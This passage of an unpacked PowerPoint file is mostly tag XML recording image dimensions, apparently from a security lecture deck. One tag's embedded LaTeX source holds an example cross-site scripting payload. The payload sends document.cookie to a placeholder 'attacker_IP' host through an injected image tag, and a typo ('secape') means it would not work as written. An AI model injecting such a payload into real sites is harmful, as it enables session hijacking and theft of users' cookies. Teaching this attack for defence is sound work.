<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.861111"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag282.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag283.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.861111"/>
  <p:tag name="ORIGINALWIDTH" val="3.263911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag284.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag285.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.013911"/>
  <p:tag name="ORIGINALWIDTH" val="1.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag286.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag287.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.3472441"/>
  <p:tag name="ORIGINALWIDTH" val="7.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag288.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag289.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.920472"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag290.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.208355"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag291.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.208355"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag292.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.3472441"/>
  <p:tag name="ORIGINALWIDTH" val="3.958355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag293.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.305556"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag294.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag295.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag296.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag297.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.819467"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag298.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag299.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.263911"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027997"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.863636"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;&lt;script&gt;&#10;   document.write('&lt;img src=http://attacker_IP:5555?c=' + &#10;   secape(document.cookie) + '  &gt;');&#10;&lt;/script&gt;&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="22"/>
  <p:tag name="IGUANATEXCURSOR" val="239"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.227273"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag300.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag301.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag302.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag303.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.208355"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag304.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.861111"/>
  <p:tag name="ORIGINALWIDTH" val="3.333333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag305.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag306.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="2.777778"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag307.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag308.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.333333"/>
  <p:tag name="ORIGINALWIDTH" val="3.680578"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag309.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag31.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="2.897745"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag310.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.680578"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag311.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag312.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.791688"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag313.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="2.847244"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag314.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag315.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag316.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag317.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag318.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.680578"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag319.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.208355"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag32.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.465927"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag320.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.305556"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag321.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.6528"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag322.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="3.541689"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag323.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag324.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.708355"/>
  <p:tag name="ORIGINALWIDTH" val="2.708355"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag325.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.708355"/>
  <p:tag name="ORIGINALWIDTH" val="2.638889"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag326.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.083333"/>
  <p:tag name="ORIGINALWIDTH" val="1.319466"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag327.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.222222"/>
  <p:tag name="ORIGINALWIDTH" val="2.083333"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag328.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag329.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.055556"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag33.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.011382"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag330.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag331.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag332.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.722222"/>
  <p:tag name="ORIGINALWIDTH" val="2.847244"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag333.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.125022"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag334.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.4028"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
